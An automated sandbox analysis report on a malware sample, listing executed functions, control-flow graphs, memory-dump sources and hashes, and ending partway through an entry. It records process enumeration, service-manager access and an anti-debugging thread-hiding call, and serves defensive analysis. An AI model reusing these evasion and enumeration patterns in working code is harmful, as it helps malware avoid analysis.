6cc2b43d WriteFile 101248->101250 101249 6cc2b3e9 WriteFile 101249->101250 101250->101248 101250->101249 101251 6cc2b718 101250->101251 101252 6cc2ab95 ReadFile 101250->101252 101251->101243 101252->101250 101253 6cad3d62 101255 6cad3bc0 101253->101255 101254 6cad3e8a GetCurrentThread NtSetInformationThread 101256 6cad3eea 101254->101256 101255->101254

                            Executed Functions

                            Function 6CAD4754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                            • Instruction ID: 89e52c12fa2f17db4263026c0277d83fcd2190644a96e119fe476d8b95d417ce
                            • Opcode Fuzzy Hash: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                            • Instruction Fuzzy Hash: 69741771645B028FC728CF28C8D0695B7F3EF8531871E8A6DC0968BB55EB74B58ACB50
                            Function 6CAE4A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: }jk$;T55$L@^
                            • API String ID: 0-4218709813
                            • Opcode ID: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                            • Instruction ID: 1486761de2dfdd98553987b207497d603c99493515637e483efb089ce3636106
                            • Opcode Fuzzy Hash: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                            • Instruction Fuzzy Hash: 0434F6716457018FC728CF28C8D0A95B7F3EF89318B1D8A6DC0968BB55E774B58ADB80
                            Function 6CC55240 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7677 6cc55240-6cc55275 CreateToolhelp32Snapshot 7678 6cc552a0-6cc552a9 7677->7678 7679 6cc552e0-6cc552e5 7678->7679 7680 6cc552ab-6cc552b0 7678->7680 7683 6cc55377-6cc553a1 call 6cc62c05 7679->7683 7684 6cc552eb-6cc552f0 7679->7684 7681 6cc55315-6cc5531a 7680->7681 7682 6cc552b2-6cc552b7 7680->7682 7690 6cc553a6-6cc553ab 7681->7690 7691 6cc55320-6cc55332 Process32NextW 7681->7691 7686 6cc55334-6cc5535d call 6cc5b920 Process32FirstW 7682->7686 7687 6cc552b9-6cc552be 7682->7687 7683->7678 7688 6cc55277-6cc55292 CloseHandle 7684->7688 7689 6cc552f2-6cc552f7 7684->7689 7697 6cc55362-6cc55372 7686->7697 7687->7678 7695 6cc552c0-6cc552d1 7687->7695 7688->7678 7689->7678 7696 6cc552f9-6cc55313 7689->7696 7690->7678 7694 6cc553b1-6cc553bf 7690->7694 7691->7697 7695->7678 7696->7678 7697->7678
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC5524E
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                            • Instruction ID: 93620b00fb95452a9160569b0bd1c67403813fb25199002ac11a949fadb81101
                            • Opcode Fuzzy Hash: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                            • Instruction Fuzzy Hash: 17314D78608300AFD7109F29CC88B0ABBF4FF95754F91492DE598C7360E3B1A8688B57
                            Function 6CAD3886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7821 6cad3886-6cad388e 7822 6cad3894-6cad3896 7821->7822 7823 6cad3970-6cad397d 7821->7823 7822->7823 7826 6cad389c-6cad38b9 7822->7826 7824 6cad397f-6cad3989 7823->7824 7825 6cad39f1-6cad39f8 7823->7825 7824->7826 7827 6cad398f-6cad3994 7824->7827 7828 6cad39fe-6cad3a03 7825->7828 7829 6cad3ab5-6cad3aba 7825->7829 7830 6cad38c0-6cad38c1 7826->7830 7831 6cad399a-6cad399f 7827->7831 7832 6cad3b16-6cad3b18 7827->7832 7833 6cad3a09-6cad3a2f 7828->7833 7834 6cad38d2-6cad38d4 7828->7834 7829->7826 7836 6cad3ac0-6cad3ac7 7829->7836 7835 6cad395e 7830->7835 7837 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7831->7837 7838 6cad39a5-6cad39bf 7831->7838 7832->7830 7839 6cad38f8-6cad3955 7833->7839 7840 6cad3a35-6cad3a3a 7833->7840 7841 6cad3957-6cad395c 7834->7841 7842 6cad3960-6cad3964 7835->7842 7836->7830 7843 6cad3acd-6cad3ad6 7836->7843 7850 6cad3860-6cad3885 7837->7850 7845 6cad3a5a-6cad3a5d 7838->7845 7839->7841 7846 6cad3b1d-6cad3b22 7840->7846 7847 6cad3a40-6cad3a57 7840->7847 7841->7835 7849 6cad396a 7842->7849 7842->7850 7843->7832 7844 6cad3ad8-6cad3aeb 7843->7844 7844->7839 7852 6cad3af1-6cad3af8 7844->7852 7856 6cad3aa9-6cad3ab0 7845->7856 7854 6cad3b49-6cad3b50 7846->7854 7855 6cad3b24-6cad3b44 7846->7855 7847->7845 7851 6cad3ba1-6cad3bb6 7849->7851 7850->7821 7864 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7851->7864 7859 6cad3afa-6cad3aff 7852->7859 7860 6cad3b62-6cad3b85 7852->7860 7854->7830 7863 6cad3b56-6cad3b5d 7854->7863 7855->7856 7856->7842 7859->7841 7860->7839 7867 6cad3b8b 7860->7867 7863->7842 7872 6cad3be0-6cad3bfe 7864->7872 7867->7851 7875 6cad3e7b 7872->7875 7876 6cad3c04-6cad3c11 7872->7876 7879 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cad3c17-6cad3c20 7876->7877 7878 6cad3ce0-6cad3cea 7876->7878 7880 6cad3dc5 7877->7880 7881 6cad3c26-6cad3c2d 7877->7881 7882 6cad3cec-6cad3d0c 7878->7882 7883 6cad3d3a-6cad3d3c 7878->7883 7892 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 7879->7892 7888 6cad3dc6 7880->7888 7886 6cad3dc3 7881->7886 7887 6cad3c33-6cad3c3a 7881->7887 7889 6cad3d90-6cad3d95 7882->7889 7890 6cad3d3e-6cad3d45 7883->7890 7891 6cad3d70-6cad3d8d 7883->7891 7886->7880 7895 6cad3e26-6cad3e2b 7887->7895 7896 6cad3c40-6cad3c5b 7887->7896 7897 6cad3dc8-6cad3dcc 7888->7897 7893 6cad3dba-6cad3dc1 7889->7893 7894 6cad3d97-6cad3db8 7889->7894 7898 6cad3d50-6cad3d57 7890->7898 7891->7889 7915 6cad3f75-6cad3fa1 7892->7915 7893->7886 7900 6cad3dd7-6cad3ddc 7893->7900 7894->7880 7901 6cad3c7b-6cad3cd0 7895->7901 7902 6cad3e31 7895->7902 7903 6cad3e1b-6cad3e24 7896->7903 7897->7872 7904 6cad3dd2 7897->7904 7898->7888 7907 6cad3dde-6cad3e17 7900->7907 7908 6cad3e36-6cad3e3d 7900->7908 7901->7898 7902->7864 7903->7897 7905 6cad3e76-6cad3e79 7903->7905 7904->7905 7905->7879 7907->7903 7911 6cad3e5c-6cad3e5f 7908->7911 7912 6cad3e3f-6cad3e5a 7908->7912 7911->7901 7914 6cad3e65-6cad3e69 7911->7914 7912->7903 7914->7897 7914->7905 7919 6cad4020-6cad4026 7915->7919 7920 6cad3fa3-6cad3fa8 7915->7920 7921 6cad402c-6cad403c 7919->7921 7922 6cad3f06-6cad3f35 7919->7922 7923 6cad407c-6cad4081 7920->7923 7924 6cad3fae-6cad3fcf 7920->7924 7926 6cad403e-6cad4058 7921->7926 7927 6cad40b3-6cad40b8 7921->7927 7925 6cad3f38-6cad3f61 7922->7925 7928 6cad40aa-6cad40ae 7923->7928 7929 6cad4083-6cad408a 7923->7929 7924->7928 7930 6cad3f64-6cad3f67 7925->7930 7931 6cad405a-6cad4063 7926->7931 7927->7924 7933 6cad40be-6cad40c9 7927->7933 7934 6cad3f6b-6cad3f6f 7928->7934 7929->7925 7932 6cad4090 7929->7932 7935 6cad3f69 7930->7935 7936 6cad4069-6cad406c 7931->7936 7937 6cad40f5-6cad413f 7931->7937 7932->7892 7938 6cad40a7 7932->7938 7933->7928 7939 6cad40cb-6cad40d4 7933->7939 7934->7915 7935->7934 7941 6cad4144-6cad414b 7936->7941 7942 6cad4072-6cad4077 7936->7942 7937->7935 7938->7928 7939->7938 7943 6cad40d6-6cad40f0 7939->7943 7941->7934 7942->7930 7943->7931
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                            • Instruction ID: 39e047a25c8babb2caa7b95a91098332f79d0687d1d9908a4200002c4acd1a64
                            • Opcode Fuzzy Hash: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                            • Instruction Fuzzy Hash: 3532B232246B018FC324CF28C890695B7F3EFD531476E8A6DC0EA5BA95D775B48ACB50
                            Function 6CAD3A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7969 6cad3a6a-6cad3a85 7970 6cad3a87-6cad3aa7 7969->7970 7971 6cad3aa9-6cad3ab0 7970->7971 7972 6cad3960-6cad3964 7971->7972 7973 6cad396a 7972->7973 7974 6cad3860-6cad388e 7972->7974 7975 6cad3ba1-6cad3bb6 7973->7975 7983 6cad3894-6cad3896 7974->7983 7984 6cad3970-6cad397d 7974->7984 7978 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7975->7978 7990 6cad3be0-6cad3bfe 7978->7990 7983->7984 7989 6cad389c-6cad38b9 7983->7989 7987 6cad397f-6cad3989 7984->7987 7988 6cad39f1-6cad39f8 7984->7988 7987->7989 7991 6cad398f-6cad3994 7987->7991 7992 6cad39fe-6cad3a03 7988->7992 7993 6cad3ab5-6cad3aba 7988->7993 7994 6cad38c0-6cad38c1 7989->7994 8010 6cad3e7b 7990->8010 8011 6cad3c04-6cad3c11 7990->8011 7996 6cad399a-6cad399f 7991->7996 7997 6cad3b16-6cad3b18 7991->7997 7998 6cad3a09-6cad3a2f 7992->7998 7999 6cad38d2-6cad38d4 7992->7999 7993->7989 8001 6cad3ac0-6cad3ac7 7993->8001 8000 6cad395e 7994->8000 8003 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7996->8003 8004 6cad39a5-6cad39bf 7996->8004 7997->7994 8005 6cad38f8-6cad3955 7998->8005 8006 6cad3a35-6cad3a3a 7998->8006 8007 6cad3957-6cad395c 7999->8007 8000->7972 8001->7994 8008 6cad3acd-6cad3ad6 8001->8008 8003->7974 8012 6cad3a5a-6cad3a5d 8004->8012 8005->8007 8013 6cad3b1d-6cad3b22 8006->8013 8014 6cad3a40-6cad3a57 8006->8014 8007->8000 8008->7997 8009 6cad3ad8-6cad3aeb 8008->8009 8009->8005 8016 6cad3af1-6cad3af8 8009->8016 8021 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 8010->8021 8017 6cad3c17-6cad3c20 8011->8017 8018 6cad3ce0-6cad3cea 8011->8018 8012->7971 8019 6cad3b49-6cad3b50 8013->8019 8020 6cad3b24-6cad3b44 8013->8020 8014->8012 8024 6cad3afa-6cad3aff 8016->8024 8025 6cad3b62-6cad3b85 8016->8025 8026 6cad3dc5 8017->8026 8027 6cad3c26-6cad3c2d 8017->8027 8029 6cad3cec-6cad3d0c 8018->8029 8030 6cad3d3a-6cad3d3c 8018->8030 8019->7994 8028 6cad3b56-6cad3b5d 8019->8028 8020->7970 8041 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 8021->8041 8024->8007 8025->8005 8036 6cad3b8b 8025->8036 8037 6cad3dc6 8026->8037 8034 6cad3dc3 8027->8034 8035 6cad3c33-6cad3c3a 8027->8035 8028->7972 8038 6cad3d90-6cad3d95 8029->8038 8039 6cad3d3e-6cad3d45 8030->8039 8040 6cad3d70-6cad3d8d 8030->8040 8034->8026 8044 6cad3e26-6cad3e2b 8035->8044 8045 6cad3c40-6cad3c5b 8035->8045 8036->7975 8046 6cad3dc8-6cad3dcc 8037->8046 8042 6cad3dba-6cad3dc1 8038->8042 8043 6cad3d97-6cad3db8 8038->8043 8047 6cad3d50-6cad3d57 8039->8047 8040->8038 8064 6cad3f75-6cad3fa1 8041->8064 8042->8034 8049 6cad3dd7-6cad3ddc 8042->8049 8043->8026 8050 6cad3c7b-6cad3cd0 8044->8050 8051 6cad3e31 8044->8051 8052 6cad3e1b-6cad3e24 8045->8052 8046->7990 8053 6cad3dd2 8046->8053 8047->8037 8056 6cad3dde-6cad3e17 8049->8056 8057 6cad3e36-6cad3e3d 8049->8057 8050->8047 8051->7978 8052->8046 8054 6cad3e76-6cad3e79 8052->8054 8053->8054 8054->8021 8056->8052 8060 6cad3e5c-6cad3e5f 8057->8060 8061 6cad3e3f-6cad3e5a 8057->8061 8060->8050 8063 6cad3e65-6cad3e69 8060->8063 8061->8052 8063->8046 8063->8054 8068 6cad4020-6cad4026 8064->8068 8069 6cad3fa3-6cad3fa8 8064->8069 8070 6cad402c-6cad403c 8068->8070 8071 6cad3f06-6cad3f35 8068->8071 8072 6cad407c-6cad4081 8069->8072 8073 6cad3fae-6cad3fcf 8069->8073 8075 6cad403e-6cad4058 8070->8075 8076 6cad40b3-6cad40b8 8070->8076 8074 6cad3f38-6cad3f61 8071->8074 8077 6cad40aa-6cad40ae 8072->8077 8078 6cad4083-6cad408a 8072->8078 8073->8077 8079 6cad3f64-6cad3f67 8074->8079 8080 6cad405a-6cad4063 8075->8080 8076->8073 8082 6cad40be-6cad40c9 8076->8082 8083 6cad3f6b-6cad3f6f 8077->8083 8078->8074 8081 6cad4090 8078->8081 8084 6cad3f69 8079->8084 8085 6cad4069-6cad406c 8080->8085 8086 6cad40f5-6cad413f 8080->8086 8081->8041 8087 6cad40a7 8081->8087 8082->8077 8088 6cad40cb-6cad40d4 8082->8088 8083->8064 8084->8083 8090 6cad4144-6cad414b 8085->8090 8091 6cad4072-6cad4077 8085->8091 8086->8084 8087->8077 8088->8087 8092 6cad40d6-6cad40f0 8088->8092 8090->8083 8091->8079 8092->8080
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                            • Instruction ID: 904e1d14ffbac96631b3635f80b97d35d4257bb6712408b24b0ae2c8c9f65c52
                            • Opcode Fuzzy Hash: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                            • Instruction Fuzzy Hash: E251F1312067018FC320CF29C880795B7F3BF96314F6A8A1DC0EA1BA95DB75B48A8B41
                            Function 6CAD39CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                            • Instruction ID: a0110e8cb4ce533a27e8e5ff8b8ebd0ecc10cbc404c4991d475e33995feb06d2
                            • Opcode Fuzzy Hash: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                            • Instruction Fuzzy Hash: B551B171106B018FC320CF29C480795B7F3BF96314F6A8B5DC0E65BA95DB75B48A8B91
                            Function 6CAD3D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                            • Instruction ID: 784c0950dd5aff4f5050fef9b2b44ff865f6615f436b5e5ff7198ae5d959b195
                            • Opcode Fuzzy Hash: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                            • Instruction Fuzzy Hash: 0131F431246B018FD320CF28C8847C6B7B3BF96314F6A4E1DC0E65BA95DB7974899B51
                            Function 6CAD3D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                            • Instruction ID: c637544a3079c8e3785592db6f36986e6af9aefb4f1c66172b2307674b55c9a2
                            • Opcode Fuzzy Hash: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                            • Instruction Fuzzy Hash: 4A31D131105B018BD724CF28C490796B7B6BF96304F6A4E1DC0EA5BA85DB757489CB52
                            Function 6CAD3C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                            • Instruction ID: d5559aa2033020262841fb1cd4a4f5081011143d227c8de3dc873339ad711a8d
                            • Opcode Fuzzy Hash: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                            • Instruction Fuzzy Hash: C72106702197028BD324CF28C89079677B6BF46304F5A4E1DD0E69BAD4DB75B4898B52
                            Function 6CC55120 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC55130
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ManagerOpen
                            • String ID:
                            • API String ID: 1889721586-0
                            • Opcode ID: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                            • Instruction ID: 308a43dc430a5e52b453cbf742fcde67d9bfdf241443d871339a8aad86eb2617
                            • Opcode Fuzzy Hash: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                            • Instruction Fuzzy Hash: D03145B4608301EFC7108F29C584B4BBFF0BB89764F90895AF988C6360D331D8689B67
                            Function 6CC4AEC0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC4AEDC
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                            • Instruction ID: 982a7148b7169c0573e7d8bebb8b243c9860660beb2c3e546c639f3114bfe660
